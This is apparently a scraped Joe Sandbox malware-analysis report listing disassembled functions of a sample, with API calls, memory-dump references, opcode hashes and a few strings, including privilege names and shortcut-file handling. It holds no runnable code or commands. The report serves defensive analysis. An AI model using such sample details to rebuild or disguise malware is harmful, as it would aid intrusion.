                                                                                                                                                                            • Instruction ID: 80ec11ac32e16c6cdaea28f958cab7f098eb4a767d20abf63bb95ee5cb6d38c4
                                                                                                                                                                            • Opcode Fuzzy Hash: 27c6c4aae17e794a5113778a6a274e671e849093ab1c8ccf50a2a7ce52641dfe
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A617E71D20249ABDF14DFA8DD85EEEB7B9AF84711F14011AF810E7280DB7499A8CF64
                                                                                                                                                                            Function 00276239 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,002769AE,?,00000000,?,00000000,00000000), ref: 0027627B
                                                                                                                                                                            • __fassign.LIBCMT ref: 002762F6
                                                                                                                                                                            • __fassign.LIBCMT ref: 00276311
                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00276337
                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,002769AE,00000000,?,?,?,?,?,?,?,?,?,002769AE,?), ref: 00276356
                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,002769AE,00000000,?,?,?,?,?,?,?,?,?,002769AE,?), ref: 0027638F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                                                            • Opcode ID: bc70523764d91f9fa0c015aa169a9d18c8cb274c5ff0a4dcffb8af389b1fc08e
                                                                                                                                                                            • Instruction ID: 3713b7ec650486c608b01e1df0e573b206835ff68289fa60f662cdfd32ca664d
                                                                                                                                                                            • Opcode Fuzzy Hash: bc70523764d91f9fa0c015aa169a9d18c8cb274c5ff0a4dcffb8af389b1fc08e
                                                                                                                                                                            • Instruction Fuzzy Hash: 2A51D570A10649DFDB10CFA8D889AEEBBF8EF09710F14815EF95AE7291D7709950CB60
                                                                                                                                                                            Function 002693C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 002693F7
                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 002693FF
                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00269488
                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 002694B3
                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00269508
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                            • String ID: csm
                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                            • Opcode ID: 7eca8a5da6930ac67aaa08578683e3e85a7d0556d795e625f494416444ddc4b9
                                                                                                                                                                            • Instruction ID: 5a11f57fcc44d5fe5f4e02928d460b515dc41c626a7062f40535ae5b39f65b10
                                                                                                                                                                            • Opcode Fuzzy Hash: 7eca8a5da6930ac67aaa08578683e3e85a7d0556d795e625f494416444ddc4b9
                                                                                                                                                                            • Instruction Fuzzy Hash: EA417734A202099FCF10DF68C885A9EBBB9BF45314F148155E8195B392DF31E9E6CF91
                                                                                                                                                                            Function 00273554 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00273518: _free.LIBCMT ref: 00273541
                                                                                                                                                                            • _free.LIBCMT ref: 002735A2
                                                                                                                                                                              • Part of subcall function 002703D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?), ref: 002703EA
                                                                                                                                                                              • Part of subcall function 002703D4: GetLastError.KERNEL32(?,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?,?), ref: 002703FC
                                                                                                                                                                            • _free.LIBCMT ref: 002735AD
                                                                                                                                                                            • _free.LIBCMT ref: 002735B8
                                                                                                                                                                            • _free.LIBCMT ref: 0027360C
                                                                                                                                                                            • _free.LIBCMT ref: 00273617
                                                                                                                                                                            • _free.LIBCMT ref: 00273622
                                                                                                                                                                            • _free.LIBCMT ref: 0027362D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                            • Opcode ID: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                                                                                                                                                            • Instruction ID: e748978d25cfeb189ab3f2a23c1f4399e31034cc988601b4348ad04b02509b24
                                                                                                                                                                            • Opcode Fuzzy Hash: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                                                                                                                                                            • Instruction Fuzzy Hash: 1C11C971560B04FBE630FBB1CC46FCB779CAF08700F808855B29DA6152DAB5A6299B91
                                                                                                                                                                            Function 00271609 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0026C5A2,0026C5A2,?,?,?,0027185A,00000001,00000001,C5E85006), ref: 00271663
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0027185A,00000001,00000001,C5E85006,?,?,?), ref: 002716E9
                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002717E3
                                                                                                                                                                            • __freea.LIBCMT ref: 002717F0
                                                                                                                                                                              • Part of subcall function 0027040E: RtlAllocateHeap.NTDLL(00000000,0026535E,?,?,00266C16,?,?,?,?,?,00265269,0026535E,?,?,?,?), ref: 00270440
                                                                                                                                                                            • __freea.LIBCMT ref: 002717F9
                                                                                                                                                                            • __freea.LIBCMT ref: 0027181E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1414292761-0
                                                                                                                                                                            • Opcode ID: eccf0553085d504c067f55701d4ee78f01341a8b5ddf955a69ceadaac86cc933
                                                                                                                                                                            • Instruction ID: a07d285e64d3bb5a295091d6c10345ce5d5c3ec0d0e58203e6386b28d3d88c9e
                                                                                                                                                                            • Opcode Fuzzy Hash: eccf0553085d504c067f55701d4ee78f01341a8b5ddf955a69ceadaac86cc933
                                                                                                                                                                            • Instruction Fuzzy Hash: F351A872620217ABEB294F68CC45EBB77A9EF44750F158229FC0CD6140DB74DC75CA50
                                                                                                                                                                            Function 00257AA3 Relevance: 9.1, APIs: 6, Instructions: 104timeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?), ref: 00257B06
                                                                                                                                                                              • Part of subcall function 0025067E: GetVersionExW.KERNEL32(?), ref: 002506AF
                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?,?,?), ref: 00257B2A
                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 00257B44
                                                                                                                                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?,?,?), ref: 00257B57
                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00257B67
                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00257B77
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2092733347-0
                                                                                                                                                                            • Opcode ID: 9cbcca2daad3e6278d1751e7732330a6282710092dd9c2bb60feafcaca32d437
                                                                                                                                                                            • Instruction ID: 9b4f2bb0a25a253584c82137b4642b67c70a6a7c54e297a00be29786aa8f4d81
                                                                                                                                                                            • Opcode Fuzzy Hash: 9cbcca2daad3e6278d1751e7732330a6282710092dd9c2bb60feafcaca32d437
                                                                                                                                                                            • Instruction Fuzzy Hash: 834138761183159FC704DFA8D8849ABB7E8FF98714F44492EF999C7210E730D948CBAA
                                                                                                                                                                            Function 0025F33B Relevance: 9.1, APIs: 6, Instructions: 102timeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,6294DA82,?,?,?,?,0027AA27,000000FF), ref: 0025F38A
                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,0027AA27,000000FF), ref: 0025F399
                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,0027AA27,000000FF), ref: 0025F3A7
                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,0027AA27,000000FF), ref: 0025F3B5
                                                                                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,?,0027AA27,000000FF), ref: 0025F3D0
                                                                                                                                                                            • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032,?,?,?,?,0027AA27,000000FF), ref: 0025F3FA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Time$System$File$Format$DateLocalSpecific
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 909090443-0
                                                                                                                                                                            • Opcode ID: 49045d1ba29d65847e56f23d41249ead3039a31abe2f49e269c9ef2b385e2f68
                                                                                                                                                                            • Instruction ID: 3b185be1143a917b9f1d54bccda44a7b5e23cd94bb9b4e9033ef1e340d989d17
                                                                                                                                                                            • Opcode Fuzzy Hash: 49045d1ba29d65847e56f23d41249ead3039a31abe2f49e269c9ef2b385e2f68
                                                                                                                                                                            • Instruction Fuzzy Hash: 22313CB2510188AFDB24DFA0DD45EEF77ACFF49710F40412AF90AD6241EB34AA54CB60
                                                                                                                                                                            Function 00262F8D Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 350COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _wcslen.LIBCMT ref: 002631A4
                                                                                                                                                                              • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 002634F2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$H_prolog3_
                                                                                                                                                                            • String ID: .lnk$0$lnk$S)
                                                                                                                                                                            • API String ID: 2000020936-2631399325
                                                                                                                                                                            • Opcode ID: 559cceb280a988c70b7ad28d0b719a0d6cb0799cf67d87201d128b384e1580c8
                                                                                                                                                                            • Instruction ID: 603dc0712ff7d4a5f88d255bf4ba54008df462a4a2dec944beac57e96f9c6ef5
                                                                                                                                                                            • Opcode Fuzzy Hash: 559cceb280a988c70b7ad28d0b719a0d6cb0799cf67d87201d128b384e1580c8
                                                                                                                                                                            • Instruction Fuzzy Hash: B8E1FA71D202699EDB28DFA4CC85BDDB7B8BF09300F5004AAE449A7251DB749BE8CF50
                                                                                                                                                                            Function 0026977A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00269771,002696CC,00266A64), ref: 00269788
                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00269796
                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002697AF
                                                                                                                                                                            • SetLastError.KERNEL32(00000000,00269771,002696CC,00266A64), ref: 00269801
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                            • Opcode ID: 2aa238790d4bcdf87f3b99324a0c3644fdef8476d5bb5ed35d458041767e9e4e
                                                                                                                                                                            • Instruction ID: af1b9bfdb4a0ba0aa89786f4cf9d23efbf1b805a16eaab5a051c930ea06e7735
                                                                                                                                                                            • Opcode Fuzzy Hash: 2aa238790d4bcdf87f3b99324a0c3644fdef8476d5bb5ed35d458041767e9e4e
                                                                                                                                                                            • Instruction Fuzzy Hash: FF01F7B623A2129EA6252F747C9957AAB8CEB023717300339F520660E4EF614CE0DA81
                                                                                                                                                                            Function 00270005 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0026B581,?,0028E088,?,0026AE80,?,0028E088,?,00000007), ref: 00270009
                                                                                                                                                                            • _free.LIBCMT ref: 0027003C
                                                                                                                                                                            • _free.LIBCMT ref: 00270064
                                                                                                                                                                            • SetLastError.KERNEL32(00000000,0028E088,?,00000007), ref: 00270071
                                                                                                                                                                            • SetLastError.KERNEL32(00000000,0028E088,?,00000007), ref: 0027007D
                                                                                                                                                                            • _abort.LIBCMT ref: 00270083
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                                                            • Opcode ID: 1ab8ad709925cc6fdcec24038293b8b0750a5b9bdb5715f777525d44aff3cbdc
                                                                                                                                                                            • Instruction ID: e364cdeb410af65609d486a1b5e3ef1191e2882fcad082fce1316682119fe59e
                                                                                                                                                                            • Opcode Fuzzy Hash: 1ab8ad709925cc6fdcec24038293b8b0750a5b9bdb5715f777525d44aff3cbdc
                                                                                                                                                                            • Instruction Fuzzy Hash: BEF0F436134602E7C62237387C8EF2B26159FC1771F258118F60C921D2EE7598BA8A54
                                                                                                                                                                            Function 00263FCF Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00263FDB
                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00263FF5
                                                                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00264006
                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00264010
                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 0026401A
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00264025
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2148572870-0
                                                                                                                                                                            • Opcode ID: 9205c16c4c0af24f877540b9b3d5229b71c0bee32144e3f653a22c3f4fa9e24c
                                                                                                                                                                            • Instruction ID: 936c96a291009410da0ed758f2e48c43e503aee8df790dc301e559273691204c
                                                                                                                                                                            • Opcode Fuzzy Hash: 9205c16c4c0af24f877540b9b3d5229b71c0bee32144e3f653a22c3f4fa9e24c
                                                                                                                                                                            • Instruction Fuzzy Hash: 82F0447291512AB7CB206FA1FC4CEDF7F6DEF42351B004011F60AD1050D6349591C7E0
                                                                                                                                                                            Function 0024A300 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 136COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0024A307
                                                                                                                                                                            • GetLastError.KERNEL32(00000054,?,?,?,?,?,0024D303,?,?,?,?,?,?,?,6294DA82,00000049), ref: 0024A427
                                                                                                                                                                              • Part of subcall function 0024AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 0024AC2E
                                                                                                                                                                              • Part of subcall function 0024AC11: GetLastError.KERNEL32 ref: 0024AC72
                                                                                                                                                                              • Part of subcall function 0024AC11: CloseHandle.KERNEL32(?), ref: 0024AC81
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$CloseCurrentH_prolog3_HandleProcess
                                                                                                                                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege$K&
                                                                                                                                                                            • API String ID: 2235100918-1226173768
                                                                                                                                                                            • Opcode ID: cc778be26e293ded0f17a75b7e1cdaf81b5dbacd6808c72ed9435fec85c2d80f
                                                                                                                                                                            • Instruction ID: a18abe95bd6dadaee6ca97ae8f6f05a65447dc1e0e226dc6b2508fc3d766dfad
                                                                                                                                                                            • Opcode Fuzzy Hash: cc778be26e293ded0f17a75b7e1cdaf81b5dbacd6808c72ed9435fec85c2d80f
                                                                                                                                                                            • Instruction Fuzzy Hash: 48417175D60209AFDF19DFE8E889BEDBBB8AB08314F04401EF500B7241DB7499948F21
                                                                                                                                                                            Function 0025DC95 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 122COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$H_prolog3
                                                                                                                                                                            • String ID: &nbsp;$<br>
                                                                                                                                                                            • API String ID: 1035939448-26742755
                                                                                                                                                                            • Opcode ID: 9258579d173849941fbbd92eafb8fa14e055a352b696bb843b12b91862b1cc43
                                                                                                                                                                            • Instruction ID: bb421f8a6945da7dc2ac68f4332646fdad572d5de292621686c834f1bdc07089
                                                                                                                                                                            • Opcode Fuzzy Hash: 9258579d173849941fbbd92eafb8fa14e055a352b696bb843b12b91862b1cc43
                                                                                                                                                                            • Instruction Fuzzy Hash: 2341A331B212119BCB259F50C88173D7332FF95706F20842AE8059F281EBB199F6CBD9
                                                                                                                                                                            Function 002601DD Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 112COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
